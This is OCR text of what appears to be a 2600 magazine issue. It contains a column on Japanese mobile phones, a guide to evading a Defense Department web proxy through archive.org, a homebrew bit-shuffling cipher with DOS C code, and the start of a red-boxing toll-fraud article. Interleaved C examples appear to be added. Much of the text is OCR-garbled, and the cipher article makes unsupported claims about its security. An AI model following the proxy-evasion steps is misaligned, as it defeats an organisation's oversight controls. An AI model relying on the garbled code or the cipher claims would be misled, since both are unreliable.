you mi ght fi nd yoursel f at the wrong end of a costs about $40 per month, i ncl udi ng just 60
samurai sword! mi nutes of cal l i ng. No free ni ghts and week-
There are three major wi rel ess servi ce ends, no free l ong di stance, and certai nl y no
provi ders i n Tokyo: Soft Bank (formerl y Voda- free mobi l e-mobi l e cal l i ng. But your unused
fone), Kddi ( marketed as "Au"), and NTT mi nutes do rol l over. The extras al ways cost
( marketed as DoCoMo) . Al l offer true 3G data extra; add another $40 for u n l i mi ted wi re
networks, al though DoCoMo and SofBank use l ess data (to the handset onl y - tetheri ng i s not
UMTS (the same data technol ogy avai l abl e al l owed) . Wi rel ess data i ncludes unl i mited
from Ci ngul ar i n a few U. S. markets), and Au emai l but not text messagi ng; that ' s another
runs COMA 1 xEV-DO (avai l abl e nati onwi de two cents per message sent.
i n the U. S. from Veri zon and Spri nt) . GSM i s Mobi l e phones have so many features, you
consi dered obsol ete in Japan and is not oper- mi ght confuse them for a computer. I n addi ti on
ated by any Japanese carri er. to the text messagi ng, emai l, web browsi ng,
Al though Japan shares certai n mobi l e phone and pi cture mai l capabi l i ti es avai l abl e on most
technol ogi es wi th the U. S., onl y Japanese wi rel ess phones i n the U. S., Japanese mobi l e
phones can use Japanese mobi l e networks. phones consi der some pretty unusual thi ngs to
Thi s i s because UMTS i s used by SofBank and be standard equi pment. For exampl e, no sel f
DoCoMo for both voi ce and data, rather than respecti ng Japanese handset woul d be caught
usi ng UMTS for data and GSM for voi ce as dead wi thout a Japanese-Engl i sh di cti onary
Ci ngul ar does. Addi t i onal l y, di ferent frequen- bui l t i n. 50MB of RAM i s standard equ i pment
ci es are used by these carri ers than Ci ngul ar for a kei tai , al ong wi t h an FM radi o, streami ng
uses i n t he U. S. Whi l e Au uses t he same COMA medi a capabi l i ty, GPS navi gat i on, and a 2. 4
megapixel camera.
You can use a mobi l e phone for al l sorts of
unexpected purposes in Japan, or potential l y for
pl aying al l sorts of unexpected pranks. Consider
the l owl y cel l phone camera. Apart from surrep
titiousl y taking pictures of school gi rl s on trai ns
( not that I 'd ever do such a thing), you can use
your camera phone to scan "QR codes." These are high density barcodes printed on products, billboards, and even business cards. Scanning a QR code can do all sorts of things, such as launching a website in your mobile browser, inserting contact information into your phone book, displaying a picture or walking map, or even downloading a ring tone.

Need walking directions from the train station to your hotel? Built-in GPS navigation has you covered, and can easily superimpose your location onto a map downloaded to your mobile phone (downloaded via the web or perhaps by scanning a QR code). Need to pay for a train ride or a newspaper? Reach for your mobile phone and you can pay instantly using your "Mobile Suica" account. Want to drain your "Mobile Suica" account into "Mobile Pachinko?" Just scan the wrong QR code. Ha ha, just kidding... I think.

Figure 1: QR Code for http://www.2600.com

I'm told I'm being charged by the packet to file this column, so it's time to draw this issue of the Telecom Informer to a close. Assuming I don't eat any bad fugu, I'll be back in the U.S. for my next column. Until then, domo arigato and sayonara. And if you see him, tell my boss that I expect a heated toilet seat in my office when I return!
BROADCAST FOR ALL THE
Wednesdays, 1900-2000 ET
WBAI 99.5 FM, New York City
WBCQ 7415 kHz - shortwave to North America
and at http://www.2600.com/offthehook over the net
Call us during the show at 1 212 209 2900. Email oth@2600.com with your comments.
And yes, we are interested in simulcasting on other stations or via satellite. Contact us if you can help spread "Off The Hook" to more listeners!
by Comspec - Sigma Nu

I'm a 22-year-old network security engineer for the Department of Defense and have been for a little over four months now. I've been operating in some fashion in the information industry since I was 14. I guess you could say my job is pretty interesting. I work normal hours: 8-5 Monday - Friday. I'm a Sigma Nu and I live at Old Dominion University in their crappy semi-new development the University Village. ODU isn't all that bad.

On my first day on the job I noticed the DoD had implemented a proxy that continuously grows in its filtering capabilities based on policies written in by contracted individuals here in my office. It's called SmartFilter. What a pain in the ass this thing is. If you want to write on restrictions of information, is one hell of a big one. Of course it's a government network and that makes all the difference from a legal standpoint. Personally, I'm all for allowing certain things to be run on my network within limited means. It is widely known that streaming audio is a bandwidth killer in some instances. Well, due to limited funding here at NEXCOM this was said to be a big problem. Until they added it to the proxy list as a big no-no. Oh well...

The chief security guy sits in the office next me. He's continuously trying to get our organization up-to-date with the security standards set forth by Visa and other organizations for transactions but he lacks in just about everything else. For Christ's sake we don't even have any of the necessary security patches for XP yet.

The following is a set of guidelines to go by to circumvent their current system. By no means should this information be used to break any laws. Don't blame me if your supervisor runs in and confronts you about this. I just thought it would be an interesting read. I would appreciate some comments back from those individuals who are able to attempt this in their own departments. If you would like to know any more information pertaining to this network hit me up. I think you'll find it to be a pretty interesting a crappy international setup. Anyways, back to real meal...

Let's say your job sucks and you want to pass the time a little faster. So you decide to surf a little and see if you can't find a good radio station that has the magical ability to make you not sleep at work. Well, you soon realize that this is nearly impossible with all the filtration going on. I admit this is pretty cheesy but an interesting way to get around it. I'm going to use the example for DI.fm. That seems to be the only music that can keep me awake at work while I am updating network diagrams or fielding phone calls from shitty outposts in Japan or some other remote location around the world.

(1) Go to Archive.org (Everyone knows this place well, or should. Read more on them on their site.)

(2) Once you're there in the top middle portion of your screen you should see the way-back machine input text area. For this example I used www.di.fm. That's Digitally Imported Radio. Click "Take Me Back."

(3) The next page that comes up will list the dates that Archive.org crawled across the site and archived its contents. You'll want to look for the most up-to-date one. Out of habit I usually choose those that have a *. That denotes that the site was recently updated. The last entry that was showing when I performed this was April 1st 2005. Click on the link.

(4) Once the Digitally Imported site comes up you can scroll down to the music of your choice. From this point you have two options. Try them both and see which works for you. (1) Using Winamp, scroll down to whatever music you choose. Click on one of the links listed under "Listen Now." Your media player should automatically navigate through Archive.org and begin to buffer the stream from DI.fm. (2) Still using Winamp, right click on one of the links listed under "Listen Now" and copy the shortcut. Then open up Winamp and under the file menu choose to input the URL. Copy and paste the URL there and click OK.

Like I said before when work has got you down this is always an option. Please continue to experiment with the internal network. If you find anything interesting I implore you to send the information my way. I'm attempting to compile a little quick reference document for fun and interesting things to do on our network. I can be reached at Comspec2600 on AIM. Enjoy the information and you all keep up the thirst for information and good work.
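From the filter administrator's side, the article's trick means a policy that is matched only against the host a request is sent to never sees the site carried inside the path. The following is an added example (not SmartFilter code and not from the article) of a log check that also classifies every URL embedded in a requested URL; the blocklist, the Wayback-style URL shape web.archive.org/web/<timestamp>/<original URL>, the function names and the sample URLs are assumptions constructed for illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

enum verdict { ALLOW = 0, BLOCK_DIRECT = 1, BLOCK_EMBEDDED = 2 };

/* Blocked domains. di.fm is the site the article uses as its example. */
static const char *BLOCKED[] = { "di.fm" };
#define NBLOCKED (sizeof BLOCKED / sizeof BLOCKED[0])

/* Return a pointer just past the next "http://", "https://" or their
 * percent-encoded forms in s (already lower-cased), or NULL if none. */
static const char *next_url(const char *s)
{
    const char *h;
    for (h = strstr(s, "http"); h != NULL; h = strstr(h + 4, "http")) {
        const char *q = h + 4;
        if (*q == 's')
            q++;
        if (strncmp(q, "://", 3) == 0)
            return q + 3;
        if (strncmp(q, "%3a%2f%2f", 9) == 0)
            return q + 9;
    }
    return NULL;
}

/* Copy the host name that starts at p, stopping at the first delimiter. */
static void copy_host(const char *p, char *host, size_t cap)
{
    size_t n = 0;
    while (*p != '\0' && strchr("/:?#%&", *p) == NULL && n + 1 < cap)
        host[n++] = *p++;
    host[n] = '\0';
}

/* True if host equals domain or is a subdomain of it (label boundary). */
static int host_in_domain(const char *host, const char *domain)
{
    size_t hl = strlen(host), dl = strlen(domain);
    if (hl < dl || strcmp(host + (hl - dl), domain) != 0)
        return 0;
    return hl == dl || host[hl - dl - 1] == '.';
}

/* Classify one logged URL. Assumes the log records absolute http(s) URLs,
 * so the first host found is the one the request was actually sent to. */
enum verdict classify(const char *url)
{
    char buf[2048], host[256];
    const char *p;
    size_t i, n = 0;
    int first = 1;

    /* Lower-case a bounded copy so scheme and host matching ignore case. */
    while (url[n] != '\0' && n + 1 < sizeof buf) {
        buf[n] = (char)tolower((unsigned char)url[n]);
        n++;
    }
    buf[n] = '\0';

    for (p = next_url(buf); p != NULL; p = next_url(p), first = 0) {
        copy_host(p, host, sizeof host);
        for (i = 0; i < NBLOCKED; i++)
            if (host_in_domain(host, BLOCKED[i]))
                return first ? BLOCK_DIRECT : BLOCK_EMBEDDED;
    }
    return ALLOW;
}

int main(void)
{
    /* Constructed proxy-log URLs, not captured traffic. */
    static const char *urls[] = {
        "http://www.di.fm/",
        "http://web.archive.org/web/20050401000000/http://www.di.fm/",
        "http://web.archive.org/web/20050401000000/http://www.example.org/",
        "http://translate.example/?u=HTTP%3A%2F%2FDI.FM%2Fradio",
        "http://notdi.fm/"
    };
    static const char *names[] = { "allow", "block (direct)", "block (embedded)" };
    size_t i;

    for (i = 0; i < sizeof urls / sizeof urls[0]; i++)
        printf("%-18s %s\n", names[classify(urls[i])], urls[i]);
    return 0;
}
```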
by Dale Thorn
d_Ch_o_r _n@yahoo.com

Algorithmic encryption as I envision it uses an executable program, a plaintext file, and a password or passwords to change the plaintext file to a ciphertext file. PGP as I understand it is an algorithmic encryption program, as compared to programs that use One-Time Pads (OTP), for example. An algorithmic program will generally use advanced mathematics such as large prime numbers, elliptic curves, discrete logarithms, and so on to generate ostensibly random bitstreams which, when XOR'd with the plaintext, produces the unreadable ciphertext.

Encryption without math has a distant similarity to the OTP method, in that a fixed lookup table of numbers is used as part of the process to generate the pseudo random values used in the encryption.

I have to interject here that the program I'm about to describe has withstood several plaintext attacks where the attacker sends me tens of thousands of plaintext or binary files and I encrypt them with the same passwords and program that encrypted the secret contest file. When I return the encrypted files to the attacker, if they can deduce the pattern or sequence of the encryption and thus decrypt the secret file, they win thousands of dollars as the contest prize.

The lookup table I currently use was generated from a simple pseudo random number generator, which is more than sufficient for my purposes. The quality of randomness is not important for the lookup table. The program is usually run with several password numbers, and the complete file is encrypted once for each number entered. Each password number pulls numbers from the lookup table beginning at that value in the lookup table and proceeding through the table sequentially until the end, where it wraps around to the first number.

A group of lookup table numbers are placed into an array (array "A"), and an equivalent number of sequential values (from zero to "n") are placed into a same-sized array (array "B"). Array "A" is then sorted and the values in array "B" are swapped the same way as the values in array "A". Array "A," containing the sorted lookup table numbers, is then discarded. Array "B", containing numbers which are now in an apparent random order, are used to reposition (or shuffle) the bits in the plaintext file.

For example, the two arrays might start off as follows:
Index  Sequential Array  Random Array
0      0                 5743
1      1                 13496
2      2                 17729
3      3                 8933
4      4                 10150
5      5                 14584
6      6                 22362
7      7                 31955
8      8                 2867
9      9                 16383
After sorting by the values in the random number array:

Index  Sequential Array  Random Array
0      8                 2867
1      0                 5743
2      3                 8933
3      4                 10150
4      1                 13496
5      5                 14584
6      9                 16383
7      2                 17729
8      6                 22362
9      7                 31955
In the second example, after sorting you will see that the sequential number array is now in a more or less random order and the originally random array is fully sorted. We now discard the random number array and move the bits from their original sequential positions (the "index" column) to the random positions shown in the "Sequential Array" column.

The good news about using array "B" to shuffle bits in the plaintext is the fact that there are no duplicate values in array "B" and no missing numbers either. Therefore we don't need a "hash" or other math-oriented technique to calculate the move-to bit positions. Another bit of good news is that since we're not using the lookup table numbers directly to calculate the move-to positions, we don't have to worry about weaknesses in the encryption due to the low quality "randomness" of the values in the lookup table.
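The sort-and-carry step described above, as an added example (not the author's CCRP code): it builds array "B" from the ten lookup values in the article's tables, moves the bits of a 10-bit block to their new positions and back, and counts 1 bits before and after, since a pure repositioning of bits leaves that count unchanged. The helper names, the bit numbering within a byte and the sample bytes are assumptions made for this example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* The ten lookup-table values from the article's example tables. */
static const long ARTICLE_KEYS[10] = {
    5743, 13496, 17729, 8933, 10150, 14584, 22362, 31955, 2867, 16383
};

/* Assumed bit numbering: bit i lives in byte i/8, counted from the low bit. */
static int get_bit(const unsigned char *buf, int i)
{
    return (buf[i / 8] >> (i % 8)) & 1;
}

static void put_bit(unsigned char *buf, int i, int v)
{
    if (v)
        buf[i / 8] |= (unsigned char)(1u << (i % 8));
    else
        buf[i / 8] &= (unsigned char)~(1u << (i % 8));
}

/* Array "A" gets n lookup values, array "B" starts as 0..n-1. Sorting A and
 * moving B's entries the same way leaves B as the move-to table. B is always
 * a permutation of 0..n-1, even when lookup values repeat.
 * Returns 0 on success, -1 if memory could not be allocated. */
int build_move_table(const long *keys, int *b, int n)
{
    long *a = malloc((size_t)n * sizeof *a);
    int i, j;

    if (a == NULL)
        return -1;
    for (i = 0; i < n; i++) {
        a[i] = keys[i];
        b[i] = i;
    }
    for (i = 1; i < n; i++) {          /* stable insertion sort on A */
        long ka = a[i];
        int kb = b[i];
        for (j = i - 1; j >= 0 && a[j] > ka; j--) {
            a[j + 1] = a[j];
            b[j + 1] = b[j];
        }
        a[j + 1] = ka;
        b[j + 1] = kb;
    }
    free(a);                           /* array "A" is discarded */
    return 0;
}

/* Encrypt direction: the bit at index i moves to position b[i]. */
void shuffle_bits(const unsigned char *in, unsigned char *out, const int *b, int n)
{
    int i;
    memset(out, 0, (size_t)(n + 7) / 8);
    for (i = 0; i < n; i++)
        put_bit(out, b[i], get_bit(in, i));
}

/* Decrypt direction: the bit at position b[i] moves back to index i. */
void unshuffle_bits(const unsigned char *in, unsigned char *out, const int *b, int n)
{
    int i;
    memset(out, 0, (size_t)(n + 7) / 8);
    for (i = 0; i < n; i++)
        put_bit(out, i, get_bit(in, b[i]));
}

/* Number of 1 bits among the first n bits of buf. */
int count_ones(const unsigned char *buf, int n)
{
    int i, ones = 0;
    for (i = 0; i < n; i++)
        ones += get_bit(buf, i);
    return ones;
}

int main(void)
{
    unsigned char plain[2] = {0xA5, 0x02};   /* constructed 10-bit sample */
    unsigned char shuffled[2], restored[2];
    int b[10], i;

    if (build_move_table(ARTICLE_KEYS, b, 10) != 0)
        return 1;
    printf("move-to table:");
    for (i = 0; i < 10; i++)
        printf(" %d", b[i]);
    shuffle_bits(plain, shuffled, b, 10);
    unshuffle_bits(shuffled, restored, b, 10);
    printf("\nplain %02X %02X  shuffled %02X %02X  restored %02X %02X\n",
           plain[0], plain[1], shuffled[0], shuffled[1], restored[0], restored[1]);
    printf("1 bits before %d, after %d\n",
           count_ones(plain, 10), count_ones(shuffled, 10));
    return 0;
}
```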
Another major factor in randomizing the ciphertext output is the fact that I use several password numbers to encrypt, with each password adding about 20 bits of security as it's commonly referred to in the crypto business. The real trick here is that since each password number is different, the additional crypto layers after the first one use different segments of the lookup table, layered over top of each other. And unlike conventional codes that can decrypt multiple XOR'd layers in any sequence, the code described here requires all layers to be decrypted in the exact reverse order of the encryption, else the plaintext cannot be recovered.

Another factor in randomizing the output is the use of random sized groups of bits when shuffling the bits. One lookup table value provides the group size ("n"), then the next "n" lookup values are used to fill the "A" array as described above. A fourth factor in preventing plaintext and ciphertext attacks from being successful - by analyzing thousands of files with just a single "1" bit in each file to see where the bit moved to after encryption - is to use the filename, or add a serial number to each file and use that name or number to further iterate the password so that each encryption is different for each file.

Lastly, the filenames or serial numbers are themselves randomized in a way that disallows an attacker to control the names or numbers to make their contribution predictable. Given all of the above, and with a simple lookup table of 2^20 values, it may still be possible to crack the encryption in a plaintext or ciphertext attack if considerably more than a million files are submitted for the chosen attack. I would guess that this code is very secure for all individual encryptions performed by an individual manually during their lifetime, even using the same set of password numbers during that entire time, but for use in a typical encryption server that processes thousands to millions of transactions per day, you would want to change the passwords each day.
In the process of developing this code, I read the very lengthy FAQs on the sci.crypt website, I read several versions of the famous "snakeoil" FAQ, I read several papers on differential analysis, and I participated in the cypherpunks forum for about seven months. I also corresponded with a few of the well known crypto experts, but I have to say that the near universal opinion of the experts is that you cannot have a secure algorithmic crypto program that doesn't use the high level mathematics as described above. Or, if all you need to create is a private-key program such as mine, you would still have to generate a random bitstream and XOR those bits against the plaintext file to get a secure encryption. Crypto experts just don't trust bit shuffling techniques, albeit that in the real world the best randomness is usually obtained by shuffling, as in playing cards or lottery tumblers.

One of the fascinating things about current cryptography is the discussion of quantum computers and the assumed fact that all password-encrypted files now archived by various agencies will be easily decrypted by the quantum computers when those computers are fully functional. It suggests to me that the assumed level of security of conventional cryptography may be a false hope, especially if people have sent PGP messages that they can't afford to have read by the wrong people. One possible positive point with this code is that 1) Due to the design, the number of encryption layers per file is not limited and 2) The design requires physical multi-layer reshuffling rather than single pass XOR'ing, which tends to defeat the shortcut mathematical wizardry of quantum decryption. Time will tell.

The following C code is DOS-based and I also have VB5 and DOS BASIC versions. The DOS BASIC code, predictably, runs several times as slow as the DOS C code, however the VB5 code is twice as fast as the DOS C code. This C code will compile OK using the Microsoft Quick-C compiler circa 1991, but I've also specified "typedefs" so that the variables used in the program can be resized for different platforms. If any of the variables are resized, you may have to resize one or more of the "malloc()" allocations in the "ifn_cryp" routine.

This program is called from a command line for encryption as follows:

CCRP filename /e passwordno1 passwordno2 passwordno3 ....

Decryption is called as follows:

CCRP filename /d passwordno1 passwordno2 passwordno3 ....

/* CCRP.H */
#include <stdio.h>          /* FILE, used by the prototypes below */
typedef char C;             /* char (strings, null-terminated) */
typedef double D;           /* double float (double precision) */
typedef float F;            /* float (single precision) */
typedef int I;              /* short integer (signed) */
typedef long L;             /* long integer (signed) */
typedef unsigned int U;     /* short integer (unsigned) */
typedef unsigned char UC;   /* unsigned character */
typedef void V;             /* void data type */
I bitget(C *cstr, I ibit);
V bitput(C *cstr, I ibit, I iput);
V ifn_cryp(U ibuf, FILE *ebuf, I iopr, L llof, L lrnd);
V ifn_msgs(C *cmsg, I iofs, I irow, I icol, I ibrp, I iext);
V ifn_read(C *cbuf, L lbyt, U ibuf, FILE *ebuf);
V ifn_sort(I *int1, L *lnt2, I *istk, I imax);
V ifn_write(C *cbuf, L lbyt, U ibuf, FILE *ebuf);
U io_vadr(I inop);
V io_vcls(I iclr);
V io_vCSr ( I irow, I iccl , I icsr ) ;
Winter 2006-2007Pa e 17
V io_vdsp ( C *cdat ,
L Itable ( L lrnd ) ;
irow, I icc! , I iclr ) ;
/* CCRP.C */
#include "stdlib.h"
#include "string.h"
#include "stdio.h"
#include "dos.h"
#include "io.h"
#include "ccrp.h"

union REGS rg;                  /* DOS registers declaration (video) */
U far *uvadr = 0;               /* video display pointer */

V main(I argc, C **argv) {      /* get user's command-line arguments */
    C cmsg[64];                 /* initialize the User message string */
    C cwrd[58] = "!#$%&'()+_.0123456789@ABCDEFGHIJKLMNOPQRSTUVXYZ[]_-{}-0";
    C cwrx[58] = "";
    U ibeg;                     /* initialize the loop-begin variable */
    U ibuf = 2048;              /* set the maximum file buffer length */
    C *cchr;                    /* initialize a temporary character variable */
    U idot;                     /* initialize the filename extension separator */
    U idx2;                     /* initialize a temporary loop variable */
    U iend;                     /* initialize the loop-ending variable */
    U ilen;                     /* initialize a temporary length variable */
    U incr;                     /* initialize the loop-increment variable */
    U indx;                     /* initialize a temporary loop variable */
    I iopr;                     /* initialize the operation code */
    U iwrd = strlen(cwrd);      /* initialize length of filename chars */
    L llof;                     /* initialize the file length variable */
    L lrnd;                     /* initialize the lookup table value */
    FILE *ebuf;                 /* get next available DOS file handle */
    U far *uvadr;               /* video display pointer */
    I int1[58];                 /* allocate filename sort index array */
    L lnt2[58];                 /* allocate filename sort lookup array */
    I istk[58];                 /* allocate filename sort stack array */

    if (argc == 1) {            /* a command line was not supplied */
        strcpy(cmsg, "Usage: CCRP (v4.3) filename [/e | /d] [key1 key2 ....]");
        ifn_msgs(cmsg, 4, 24, 79, 0, 1);
        /* display usage message and exit */
    }
    if (argc < 4 || argc > 15) {    /* no. of seed keys should be one to 12 */
        ifn_msgs("Invalid number of parameters", 4, 24, 79, 1, 1);
        /* display error message [above] and exit */
    }
    if (argv[2][0] != '/') {    /* slash preceding opcode param missing */
        ifn_msgs("Invalid operation parameter", 4, 24, 79, 1, 1);
        /* display error message [above] and exit */
    }
    strupr(argv[1]);            /* uppercase the target filename */
    strupr(argv[2]);            /* uppercase the operation code */
    if (strchr("ED", argv[2][1]) == NULL) {     /* invalid opcode parameter */
        ifn_msgs("Invalid operation parameter", 4, 24, 79, 1, 1);
        /* display error message [above] and exit */
    }
    idot = strcspn(argv[1], ".");   /* position of filename extension separator */
    ilen = strlen(argv[1]);         /* length of target filename */
    if (idot == 0 || idot > 8 || ilen - idot > 4) {     /* filename is bad */
        ifn_msgs("Invalid filename", 4, 24, 79, 1, 1);  /* filename is bad */
        /* display error message [above] and exit */
    }
    if (idot < ilen) {          /* filename extension separator found! */
        if (strcspn(argv[1] + idot + 1, ".") < ilen - idot - 1) {
            ifn_msgs("Invalid filename", 4, 24, 79, 1, 1);  /* 2nd '.' was found! */
            /* display error message [above] and exit */
        }
        if (idot == ilen - 1) {     /* extension separator at end of filename */
            ilen--;                 /* decrement length of target filename */
            argv[1][ilen] = '\0';   /* decrement length of target filename */
        }
    }
    ebuf = fopen(argv[1], "rb+");       /* open the selected file */
    llof = filelength(fileno(ebuf));    /* get length of selected file */
    if (ebuf == NULL || llof == -1L || llof == 0) {     /* length=0 or call failed */
        fclose(ebuf);                   /* close the selected file */
        remove(argv[1]);                /* kill the zero-length file */
        strcpy(cmsg, argv[1]);          /* copy filename to message */
        strcat(cmsg, " not found");     /* add " not found" to message */
        ifn_msgs(cmsg, 4, 24, 79, 1, 1);    /* display message and exit */
    }
    iopr = argv[2][1] - 68;     /* opcode (1=encrypt, 0=decrypt) */
    if (iopr == 1) {            /* this is the encrypt operation */
        ibeg = 3;               /* set the loop-begin variable */
        iend = argc;            /* set the loop-ending variable */
        incr = 1;               /* set the loop-increment variable */
    } else {                    /* this is the decrypt operation */
        ibeg = argc - 1;        /* set the loop-begin variable */
        iend = 2;               /* set the loop-ending variable */
        incr = -1;              /* set the loop-increment variable */
    }
    for (indx = ibeg; indx != iend; indx += incr) {     /* loop thru # of seed keys */
        lrnd = atol(argv[indx]) % (L)1048576;   /* get lookup table seed key */
        for (idx2 = 0; idx2 < iwrd; idx2++) {   /* loop through array elements */
            int1[idx2] = idx2;          /* offsets from current byte offset */
            lrnd = ltable(lrnd);        /* get the next lookup table value */
            lnt2[idx2] = lrnd;          /* put lookup value to sort array */
        }
        ifn_sort(int1, lnt2, istk, iwrd - 1);   /* sort lookup array */
        for (idx2 = 0; idx2 < iwrd; idx2++) {   /* loop thru filename chars */
            cwrx[int1[idx2]] = cwrd[idx2];
        }
        /* shuffle bytes in valid filename chars [above] */
        lrnd = atol(argv[indx]) % (L)1048576;   /* get lookup table seed key */
        for (idx2 = 0; idx2 < ilen; idx2++) {   /* loop thru filename chars */
            cchr = strchr(cwrx, argv[1][idx2]); /* filename char. position */
            if (cchr == NULL) {         /* character not found in filename */
                ifn_msgs("Invalid character in filename", 4, 24, 79, 1, 1);
                /* display error message [above] and exit */
            }
            lrnd = (lrnd + (cchr - cwrx + 1)) % (L)1048576;     /* add value to seed */
            lrnd = ltable(lrnd);        /* reiterate value of seed key */
        }
        if (iopr == 1) {        /* encrypt operation specified */
            ifn_msgs("Encrypting layer", 4, 24, 79, 0, 0);  /* encrypt msg. */
        } else {                /* decrypt operation specified */
            ifn_msgs("Decrypting layer", 4, 24, 79, 0, 0);  /* decrypt msg. */
        }
        itoa(indx - 2, cmsg, 10);               /* convert 'indx' to string */
        ifn_msgs(cmsg, -21, 24, 79, 0, 0);      /* show layer number message */
        ifn_cryp(ibuf, ebuf, iopr, llof, lrnd); /* encrypt or decrypt */
    }
    ifn_msgs("Translation complete", 4, 24, 79, 0, 1);
}

V ifn_cryp(U ibuf, FILE *ebuf, I iopr, L llof, L lrnd) {    /* encrypt routine */
    C cmsg[64];                     /* initialize the User message string */
    U ibit = 0;                     /* initialize the bit offset in cbuf */
    I ieof = 0;                     /* initialize the EOF flag */
    U ilen;                         /* initialize a temporary length variable */
    U indx;                         /* initialize the for-next loop counter */
    L lbyt;                         /* initialize the file pointer variable */
    C *cbuf = (C *)malloc(2048);    /* initialize the file buffer */
    C *ctmp = (C *)malloc(2048);    /* initialize the temp buffer */
    I *int1 = (I *)malloc(3074);    /* allocate the sort index array */
    L *lnt2 = (L *)malloc(6148);    /* allocate sort lookup number array */
    I *istk = (I *)malloc(3074);    /* allocate the sort stack array */

    for (lbyt = 0; lbyt < llof; lbyt += ibuf) {     /* process in ibuf segments */
        if (llof > (L)ibuf) {                       /* so we don't divide by zero */
            ltoa(lbyt / (llof / 100), cmsg, 10);    /* convert pct. to string */
            strcat(cmsg, "%");                      /* append '%' symbol to message */
            ifn_msgs("    ", -24, 24, 79, 0, 0);    /* erase prev. complete msg. */
            ifn_msgs(cmsg, -24, 24, 79, 0, 0);      /* show pct. completed msg. */
        }
        if (lbyt + ibuf >= llof) {      /* current file pointer + ibuf spans EOF */
            ibuf = (U)(llof - lbyt);    /* reset file buffer length */
            ieof = 1;                   /* set the EOF flag ON */
        }
        ifn_read(cbuf, lbyt, ibuf, ebuf);   /* read data into the file buffer */
        while (1) {                     /* loop to process bit groups in cbuf */
Continued on page 48
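
The experts' distrust of pure bit shuffling that the article mentions, and its own advice to change the passwords on a busy server, can be seen on a toy model. The following is an added example and not the article's CCRP code (whose shuffle routine is not on this page): make_perm, shuffle_bits, the LCG constants and the 64-bit block are assumptions standing in for one fixed keyed bit permutation. It shows that a shuffle never changes the number of 1 bits, and that a permutation reused under one key is fully rebuilt from six chosen plaintexts.

```c
#include <stdint.h>
#include <stdio.h>

#define NBITS 64                    /* one block of the toy cipher */

static uint8_t g_secret[NBITS];     /* perm[i] = where plaintext bit i ends up */

/* Assumed stand-in for a keyed shuffle: Fisher-Yates driven by a small LCG. */
void make_perm(uint32_t seed, uint8_t perm[NBITS]) {
    int i, j;
    uint8_t t;
    for (i = 0; i < NBITS; i++) perm[i] = (uint8_t)i;
    for (i = NBITS - 1; i > 0; i--) {
        seed = seed * 1664525u + 1013904223u;
        j = (int)((seed >> 16) % (uint32_t)(i + 1));
        t = perm[i]; perm[i] = perm[j]; perm[j] = t;
    }
}

/* Pure transposition: every bit is moved, none is changed. */
uint64_t shuffle_bits(uint64_t block, const uint8_t perm[NBITS]) {
    uint64_t out = 0;
    int i;
    for (i = 0; i < NBITS; i++)
        if ((block >> i) & 1u) out |= (uint64_t)1 << perm[i];
    return out;
}

/* Inverse of shuffle_bits for the same permutation table. */
uint64_t unshuffle_bits(uint64_t block, const uint8_t perm[NBITS]) {
    uint64_t out = 0;
    int i;
    for (i = 0; i < NBITS; i++)
        if ((block >> perm[i]) & 1u) out |= (uint64_t)1 << i;
    return out;
}

int popcount64(uint64_t v) {
    int n = 0;
    while (v) { v &= v - 1; n++; }
    return n;
}

/* Leak 1: the ciphertext always has exactly as many 1 bits as the plaintext. */
int weight_after_shuffle(uint32_t seed, uint64_t block) {
    uint8_t perm[NBITS];
    make_perm(seed, perm);
    return popcount64(shuffle_bits(block, perm));
}

/* The key holder encrypts whatever block it is handed, always with g_secret. */
uint64_t encrypt_oracle(uint64_t plaintext) {
    return shuffle_bits(plaintext, g_secret);
}

/* Leak 2: chosen plaintext k has bit i set iff binary digit k of i is 1.
 * Read column-wise, the six ciphertext bits at output position p spell out
 * the index of the plaintext bit that landed there. */
int recover_perm(uint8_t guess[NBITS]) {
    uint64_t ct[6], pt;
    int i, k, p, src;
    for (k = 0; k < 6; k++) {
        pt = 0;
        for (i = 0; i < NBITS; i++)
            if ((i >> k) & 1) pt |= (uint64_t)1 << i;
        ct[k] = encrypt_oracle(pt);
    }
    for (p = 0; p < NBITS; p++) {
        src = 0;
        for (k = 0; k < 6; k++)
            if ((ct[k] >> p) & 1u) src |= 1 << k;
        guess[src] = (uint8_t)p;
    }
    return 6;                       /* number of encryptions requested */
}

/* Encrypt under a secret seed, rebuild the table without using the seed,
 * then decrypt a block that was not one of the six chosen plaintexts. */
uint64_t recover_and_decrypt(uint32_t secret_seed, uint64_t plaintext) {
    uint8_t guess[NBITS];
    uint64_t ciphertext;
    make_perm(secret_seed, g_secret);
    ciphertext = encrypt_oracle(plaintext);
    recover_perm(guess);
    return unshuffle_bits(ciphertext, guess);
}

int main(void) {
    uint64_t msg = 0x0123456789ABCDEFULL;   /* constructed sample block */
    printf("weight in/out: %d/%d\n",
           popcount64(msg), weight_after_shuffle(20061u, msg));
    printf("decrypted without the key: %016llx\n",
           (unsigned long long)recover_and_decrypt(20061u, msg));
    return 0;
}
```

A shuffle whose table changes with every block and every layer is not covered by this model; the point is only that any table reused unchanged across messages gives these two leaks.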
Red Boxing Revealed

by Royal
anonymousroyal@gmail.com

Disclaimer: The information contained in this article is for informational purposes only. Red boxing is illegal and a form of toll fraud. I disclaim all responsibility and liability for any illegal activity based on the information contained in this article.

Red boxing is a topic in the phreaking scene that you've probably read up on many times before in various text files and articles, both online and in magazines. Because of that, you're probably not expecting much by reading yet another article on this subject. On the contrary, this article will provide you with everything you need to know about red boxing today, beyond just answering the simple question, "Can I still red box?" I'm actually going to explain how you can still do it. In this article, I will explain why red boxing is still possible and what has changed since a few years ago. I will also go over many ways of accomplishing this easy task, including a few tricks and some other advice you can use when the necessary coin prompt doesn't come on the line.

Note: A lot of the information you are about to read is based on Verizon payphones, so keep that in mind if any information seems inaccurate for payphones from other providers.

Red boxing, as most of you should already know, is a simple method of placing free calls on payphones using the tones that a payphone generates when coins are inserted. If you were unaware of this, then you should do some reading on the subject before continuing further, otherwise you may not understand the information in this article. For those of you who have already read the many text files and articles out there, you may recall some of the more recent ones claiming that red boxing is either obsolete or can still be accomplished but with certain limitations. Regardless of what you may have read, the truth is that it is still possible today.

What Makes Red Boxing Possible

